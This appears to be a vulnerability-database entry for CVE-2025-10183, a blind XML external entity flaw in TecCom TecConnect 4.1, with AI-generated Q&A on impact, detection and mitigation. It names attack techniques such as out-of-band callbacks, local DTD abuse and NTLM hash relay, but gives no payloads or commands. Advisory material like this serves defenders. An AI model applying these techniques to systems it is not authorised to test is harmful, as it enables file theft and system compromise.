CVE-2025-10183
BaseFortify
Publication date: 2025-09-09
Last updated on: 2025-09-09
Assigner: Black Lantern Security
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| teccom | tecconnect | 5 |
| teccom | tecconnect | 4.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-10183 is a blind XML External Entity (XXE) injection vulnerability in the OpenMessaging webservice of TecCom TecConnect version 4.1. It allows an unauthenticated attacker to send specially crafted XML payloads that exploit the XML parser to read arbitrary files from the server and send their contents to an attacker-controlled server. The vulnerability involves bypassing error message encodings and leveraging local DTDs to exfiltrate files and relay NTLM hashes, potentially leading to full system compromise. [1]
How can this vulnerability impact me? :
This vulnerability can have severe impacts including unauthorized disclosure of sensitive files from the server, exfiltration of arbitrary data, and escalation to full system compromise through NTLM hash relay attacks. An attacker can read local files, capture authentication hashes, and potentially gain control over the affected system, leading to data breaches and loss of system integrity. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection can be performed by targeting the vulnerable OpenMessaging webservice endpoint, typically at openmessaging.asmx, with crafted SOAP POST requests containing HTML-encoded XXE payloads. Techniques include sending out-of-band XXE payloads that trigger DNS or HTTP callbacks to an attacker-controlled server (e.g., Burp Collaborator) to confirm vulnerability. Tools and methods used include IIS Shortname Enumeration to locate endpoints, Wsdler to parse WSDL, and Burp Suite Repeater for sending crafted requests. Additionally, monitoring for unusual outbound DNS or HTTP requests from the server may indicate exploitation attempts. Specific commands are not provided, but usage of Burp Suite with crafted SOAP requests and monitoring network callbacks is recommended. [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade from the vulnerable TecCom TecConnect 4.1, which is end-of-life as of December 2023, to TecCom Connect 5. This upgrade addresses the vulnerability. Since the vulnerable component is the OpenMessaging webservice at openmessaging.asmx, restricting or disabling access to this endpoint until upgrade may also reduce risk. Additionally, monitoring and blocking suspicious outbound network traffic related to XXE exploitation attempts can help mitigate impact. [1]